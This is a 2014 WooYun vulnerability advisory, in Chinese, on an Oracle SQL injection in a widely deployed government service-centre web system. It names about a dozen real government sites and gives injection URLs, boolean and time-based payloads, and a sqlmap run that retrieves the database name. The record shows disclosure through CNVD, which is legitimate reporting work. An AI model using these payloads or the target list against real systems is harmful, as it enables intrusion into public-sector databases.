当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086650

漏洞标题:某Gov行政中心系统Oracle注入漏洞(使用量大)

相关厂商:深圳太极软件有限公司

漏洞作者: 路人甲

提交时间:2014-12-10 13:27

修复时间:2015-03-10 13:28

公开时间:2015-03-10 13:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-10: 细节已通知厂商并且等待厂商处理中
2014-12-14: 厂商已经确认,细节仅向厂商公开
2014-12-17: 细节向第三方安全合作伙伴开放
2015-02-07: 细节向核心白帽子及相关领域专家公开
2015-02-17: 细节向普通白帽子公开
2015-02-27: 细节向实习白帽子公开
2015-03-10: 细节向公众公开

简要描述:

其涉及全国各省行政服务中心,案例不比大汉jcms少

详细说明:

看这里。。。
接上一弹 WooYun: 某大型政府服务系统Oracle注入(使用量大)
所有涉及单位为政府政务中心(其涉及全国各省行政服务中心,案例不比大汉jcms少):
如:
http://www.sinanxzfw.gov.cn/ 思南县行政服务中心
http://www.yjxzfw.com.cn/ 印江县行政服务中心
http://www.gygxzw.gov.cn:8066/ 贵阳国家高新区行政服务中心
http://www.tlsp.net/ 铁岭市公共行政服务中心
http://58.42.249.116/ 云岩区政务服务中心
http://218.201.232.67:8080/ 铜仁市行政服务中心
http://hxasc.cn/ 花溪区行政服务中心
http://jc.dlxg.gov.cn/ 大连西岗区电子监察网
http://jjjc.sqxz.gov.cn/ 铜仁市行政服务中心
http://119.1.108.246/ 望谟县行政服务中心
http://58.42.241.14:6778/ 贵阳经济开发区政务服务中心
http://119.1.108.246/
....//只统计一部分,其他案例请自行统计。

HY6YVAJJZEQERW7]JA]LW@C.jpg


QT~C[(ZJCBA_~G~7(PJB22M.jpg


注入参数为:type
http://www.sinanxzfw.gov.cn/morebrowsnews.do?menu1=中心动态&menu2=中心新闻&type=2
注入例子:
http://www.sinanxzfw.gov.cn/morebrowsnews.do?menu1=中心动态&menu2=中心新闻&type=2 AND 3*2*2=12 (正常显示)
http://www.sinanxzfw.gov.cn/morebrowsnews.do?menu1=中心动态&menu2=中心新闻&type=2 AND 3*2*2=123 (非正常显示)
sqlmap注入如下:

16RKGHGYALH(}WXH8IW_D}N.jpg


D:\sqlmap>python sqlmap.py -u "http://www.sinanxzfw.gov.cn/morebrowsnews.do?menu
1=中心动态&menu2=中心新闻&type=2" -p type --current-db
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 13:20:01
[13:20:01] [INFO] resuming back-end DBMS 'oracle'
[13:20:01] [INFO] testing connection to the target url
[13:20:02] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: type
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: menu1=????&menu2=????&type=2 AND 7241=7241
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: menu1=????&menu2=????&type=2 AND 3913=DBMS_PIPE.RECEIVE_MESSAGE(CHR
(72)||CHR(108)||CHR(67)||CHR(76),5)
---
[13:20:02] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
[13:20:02] [INFO] fetching current database
[13:20:02] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[13:20:02] [INFO] retrieved:
[13:20:02] [WARNING] reflective value(s) found and filtering out
SNWZ_WEB
current schema (equivalent to database on Oracle):    'SNWZ_WEB'
[13:20:29] [INFO] fetched data logged to text files under 'D:\sqlmap\output\www.
sinanxzfw.gov.cn'
[*] shutting down at 13:20:29


库名:SNWZ_WEB
其他的就自测吧!

涉事政府单位还是蛮多的,请cncert自查。。。都是重要政务系统....

漏洞证明:

http://www.sinanxzfw.gov.cn/morebrowsnews.do?menu1=中心动态&menu2=中心新闻&type=2 AND 3*2*2=12 (正常显示)
http://www.sinanxzfw.gov.cn/morebrowsnews.do?menu1=中心动态&menu2=中心新闻&type=2 AND 3*2*2=123 (非正常显示)
sqlmap注入如下:

16RKGHGYALH(}WXH8IW_D}N.jpg


D:\sqlmap>python sqlmap.py -u "http://www.sinanxzfw.gov.cn/morebrowsnews.do?menu
1=中心动态&menu2=中心新闻&type=2" -p type --current-db
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 13:20:01
[13:20:01] [INFO] resuming back-end DBMS 'oracle'
[13:20:01] [INFO] testing connection to the target url
[13:20:02] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: type
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: menu1=????&menu2=????&type=2 AND 7241=7241
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: menu1=????&menu2=????&type=2 AND 3913=DBMS_PIPE.RECEIVE_MESSAGE(CHR
(72)||CHR(108)||CHR(67)||CHR(76),5)
---
[13:20:02] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
[13:20:02] [INFO] fetching current database
[13:20:02] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[13:20:02] [INFO] retrieved:
[13:20:02] [WARNING] reflective value(s) found and filtering out
SNWZ_WEB
current schema (equivalent to database on Oracle):    'SNWZ_WEB'
[13:20:29] [INFO] fetched data logged to text files under 'D:\sqlmap\output\www.
sinanxzfw.gov.cn'
[*] shutting down at 13:20:29


库名:SNWZ_WEB
其他的就自测吧!

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-12-14 12:30

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无